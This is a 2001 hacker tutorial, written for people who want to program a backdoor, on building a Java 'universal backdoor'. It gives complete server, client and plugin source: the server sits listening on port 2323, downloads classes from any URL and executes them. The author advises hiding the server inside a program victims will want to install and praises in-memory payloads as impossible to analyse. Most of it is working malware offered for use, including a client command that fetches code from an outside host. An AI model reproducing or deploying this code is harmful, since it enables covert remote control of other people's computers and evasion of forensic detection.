Writing an universal backdoor by existenz ( 03-01-2001 )



In this article i want to discuss a "new" approach to writing a backdoor.


1) The idea !

The idea is to write a simple ( but universal ) backdoor, that is able to perform
ANY TASK without knowing ( at the time it is written and installed ) which TASKS it will
perform in the future.
The backdoor will be very small, containing no coded functionality, but being able to be
used for any purpose you don't even know of when you install the backdoor on the victim's
PC.
Plugin mechanism may be a better description for this kind of backdoor, because anytime
your victim is online, you can "plugin" some "feature" and run it on his machine.

This article will focus on the underlying concept, not on the implementation of all the
possible "features".

It's an article for people who want to programm a backdoor. Nevertheless it will present
a simple ready-to-run backdoor that you just have to compile and install.

AND: I will use Java as the programming language !


2) Why Java ?

The answer is simple:

Java is a platform independent, "write once, run anywhere" language.

No matter if u want to install your programm on a Windows, Linux, Unix, Mac ... OS.
The only thing you need ( and what is most often already installed ) is a Java runtime.

The Java runtimes are free. You can get them at http://java.sun.com

Java is THE "internet language", which means it is a very powerfull networking language.

I don't want to discuss the advantages and disadvantages of Java here. I know that there
are things you can't ( or don't want to ) do in Java. Ok, then use C/C++ !
( Or use the Java Native Interface JNI to call C/C++ from Java or Java from C/C++ )

Only one more thing: Java isn't ( anymore ) as slow as it is ( was ) supposed to be.
[ Since J2SE 1.3 ( Java 2 Standard edition ) introduced the HotSpot JIT ( Just in Time
Compiler ). ]


You don't need to be a Java programmer to understand the concepts of this article.
Yet some ( object oriented ) programming experience is needed to follow the examples.
If you want to learn more about Java, i found the book "Go To Java 2" by Guido Krüger
( Addison-Wesley ) a good one to start ( it also covers some network programming ! ).


3) How this will be done !

The backdoor will be composed out of 3 parts:

-> A server

-> A plugin ( that will do the actual job )

-> A client

The server will do nothing but listen for a client and load a plugin if told to do so
by a client.
The client will be able to connect to a server and tell him what plugin to use and where
to find it on the net.
The plugin will contain the actual code of the things to do.

The server will use the ClassLoader technology of java. This means the server doesnt know
of the features it will load and execute. The server will be able to load any object you
write, from anywhere on the internet.
Once loaded the PlugIn will be run in a Thread and the server will go on, listening for
clients.

The plugin(s) can be any Java object you write. It just has to implement the

Runnable

interface.


3a) What is a ClassLoader ?

Java is object oriented. Anything is based on classes and objects. When you use a Java
object, the runtime loads the corresponding class automaticaly, using a ClassLoader.
Core API classes like String, Integer ... ( and many more ! ) are already provided in
the runtime.
When you write an applet and a browser loads it from your web site, the browser's runtime
uses a ClassLoader to load the classes you have written ( which cant' be found on the
local machine ) from a directory on your web server.
But you can also easely use a ClassLoader to load classes from anywhere on the internet!


3b) What is an interface ?

Let's make it short:
The interface Runnable assures that the plugin(s) can be run in a Thread and that they
all contain the method

run()

( which will be invoked by the server ).
To learn more about interfaces get a book about Java.


4) Let's do it !

Now let's do some coding!

Here's the server:
( The listing seems to be long, but actually there are more lines of comments
than lines of code ! So read the comments ! )

----------------------------------------------------------------------------------------------
// First let's import all the classes needed

import java.io.InputStream;
import java.net.Socket;
import java.net.ServerSocket;
import java.net.URL;
import java.net.URLClassLoader;

// The BackDoorServer implements Runnable, which means it will be run
// in a Thread
public class BackDoorServer implements Runnable {
// The port the server will listen and a variable
// where the inputs will be stored
int srvPort;
int inputChar;

// The ServerSocket and the Socket that will do
// the communication
ServerSocket serverDoor;
Socket commSocket;

// The dafault constructor will build a Server on port 2323
public BackDoorServer() {
this( 2323 );
}

// Use this contructor if you want to run the server on a different port
public BackDoorServer( int port ) {
srvPort = port;

// Make the server run in a Thread
Thread theDoor = new Thread( this );
// Starts the Thread and invokes the method run()
theDoor.start();
}

// Let it all begin !
public void run() {
try {
// Initialize a server on the Port set by the contructor
serverDoor = new ServerSocket( srvPort );

// Listen till the client kills you!
boolean alive = true;
while( alive ) {
// Build the communication socket
// This method will BLOCK until a client connects
// to the server !
// That is why we need a Thread
commSocket = serverDoor.accept();

// Get an InputStream to read from the Socket
InputStream in = commSocket.getInputStream();
// Build a StringBuffer to store the input
// By default we assume the input to be no longer than
// 128 bytes
StringBuffer line = new StringBuffer( 128 );

// Now read the input from the client and store it
// in the StringBuffer
while( (inputChar = in.read()) != -1 )
line.append( "" + ( char ) inputChar );

// Convert the StringBuffer into a String
String lines = line.toString();

// What was the input ?
if( lines.equals( "RIP!" ) ) {
// Oh NO! The client killed me :(
// Shut down the BackDoorServer
alive = false;
} else {
// Hey! The client told me to load a "PlugIn"
// Let's try it !
try {
// See the client documentation for the format
// of the commands
// The next 3 lines seperate the PlugIn location from
// the PlugInName
int seperator = lines.indexOf( "*" );
String plugInLoc = lines.substring( 0, seperator );
String plugInName = lines.substring( seperator + 1,
lines.length() );

// Where in the whole wide world do we find our PlugIn ?
URL[] urlsToLoadFrom = new URL[] {
new URL( plugInLoc )
};

// From whereever, we will get it using a ClassLoader
URLClassLoader plugInLoader = new
URLClassLoader( urlsToLoadFrom );

// Now get the Class the Client told you to get !
Class plugIn = Class.forName( plugInName, true,
plugInLoader );

// Make the PlugIn run in a Thread
// ( see "What is an interface?" )
//and ....
Thread plugInT = new Thread(( Runnable )
plugIn.newInstance());
// RUN IT!
plugInT.run();

// We don' need that anymore ...
plugInName = null;
plugInLoc = null;
} catch( Throwable t ) {
// An error occured ! .. SHIT!
// but, nevertheless .. lets ignore it ! :)
// just go on and listen for another try !
}
}
// OK! the PlugIn is running .. so go on and listen
// for another one
in.close();
line = null;
lines = null;
}
// Oh no .. we are dead ... so close the Sockets

serverDoor.close();
commSocket.close();
} catch ( Throwable t ) {
// Any error occured ! .. SHIT!
// but, nevertheless .. lets ignore it again ! :)
}
}
}
----------------------------------------------------------------------------------------------

That's all ! save it as BackDoorServer.java and compile it:

javac BackDoorServer.java

To install the server you can use any java utility you write.
Just instantiate an object of the type BackDoorServer and call one of the constructors.

To illustrate how it works lets write a simple programm that does nothing but implement a server:

----------------------------------------------------------------------------------------------
public class DoNothing {
// The main method will be called first when excuted
public static void main( String args[] ) {
try {
// Just implement the server ...
BackDoorServer test = new BackDoorServer();
// Because we use the default constructor the server will listen on port 2323


// Here u could do anything that makes this Prog
// a Prog your victim really wants to install and run :)
} catch( Throwable t ) {
// Hey ! .. What's an error ?
}
}
}
----------------------------------------------------------------------------------------------

Save it as DoNothing.java, compile it:

javac BackDoorServer.java

and run it:

java DoNothing


Now the server runs on port 2323 on your machine!
So let's write a simple client:

----------------------------------------------------------------------------------------------
// Import all the classes we need
import java.io.OutputStream;
import java.net.Socket;

public class BackDoorClient {
// This method will be called first
// The format is: java BackDoorClient <Server> <Port> <PlugInLocation*PlugInName>
// ??? ok an example:
//
// java BackDoorClient localhost 2323 http://e-xistenz.net/*WindowPlugIn
//
// This will cause the client to connect to a server on your own machine on port 2323
// and make the server load the class WindowPlugIn from my website
// NOTE: 1) The location and the name of the PlugIn are seperated by "*"
// 2) The / before the * is important to tell the URLClassLoader to
// search in the Directory !
public static void main( String args[] ) {
try {
// Get the command line parameters
String server = args[ 0 ];
int port = ( new Integer( args[ 1 ] ) ).intValue();
String command = args[ 2 ];

// Connect to the server and get the OutPutStream to tell the
// server what to do
Socket clientSocket = new Socket( server, port );
OutputStream out = clientSocket.getOutputStream();

// Communicate with the server
out.write( command.getBytes() );

// That's it ! ... Close everything before we leave
out.close();
clientSocket.close();
} catch( Throwable t ) {
// Ok ... display the error information
t.printStackTrace();
}
}
}
----------------------------------------------------------------------------------------------

Save it as BackDoorClient.java, start another shell window, compile the class:

javac BackDoorClient.java

and run it:

NOTE: You have to be connected to the internet to run it, because the server
loads the plugin from my website! See the section about the WindowPlugIn if you want
to know how to test it localy on your machine.

java BackDoorClient localhost 2323 http://e-xistenz.net/*WindowPlugIn

Cool ! The Server loaded the class WindowPlugIn from my webpage and executed it !

Execute it again .. another window will appear !
Remember: Threads are used !

Now, let's kill the server:

java BackDoorClient localhost 2323 RIP!

The server shuts down !

Another attempt to run the client and connexct to the server, will cause an error,
because the server isnt listening anymore.
I know the server task doesnt stop .. thats because the threads are still running,
but as i mentioned before:
This is an article about the underlying concept, not about the best implementation.


Ok, but what does the WindowPlugIn look like ?
Here's the code:

----------------------------------------------------------------------------------------------
import java.awt.Frame;

// The only thing your plugin must do is to
// implement Runnable
public class WindowPlugIn implements Runnable {
// Here the work starts
public void run() {
// You can write any plugin ...
// No matter what is does, it will work with the server !
// In this example just pop up a window

Frame plugInFrame = new Frame( "Hello victim!" );
plugInFrame.setSize( 256, 64 );
plugInFrame.setVisible( true );
}
}
----------------------------------------------------------------------------------------------

Now you can write any class, doing anything you want, store it on any server in the net and
execute it on your victims machine by simply telling the backdoor which "feature" to load and
where to find it.
When you write your own plugins, compile them and place them in the same directory as your
( local ) running ( test- )server. Then run the client using:

java BackDoorClient localhost 2323 file:*<YourPlugInName>

Now the server will load the plugin from your local machine.


5) Why all this ?

There's a great advantage about this concept:
Whatever you make your victim's machine do, it CANT be reconstructed or analysed !

You load the "features" at runtime and they only reside in the MEMORY of your victim's PC
,until their work is done.

There's no "backdoor code" on the victims machine that can be blamed for the actions your
"plugin" performed.

Moreover: You can load your plugin from anywhere on the internet !
It does not have to be loaded from your own PC !


6) The future !

Why not write more plugins, building a "central library" somwhere on the net anyone can use ?
Why not write a better server, handling more commands, or even giving back return codes ?
Why not write a GUI client, also able to do some ip scanning ?

Maybe ill spend some more time on this.




Feel free to contact me at [email protected] for questions or comments.
And visit my website www.e-istenz.net ( still under construction ) to get some cool
Java tools.

existenz
03-01-2001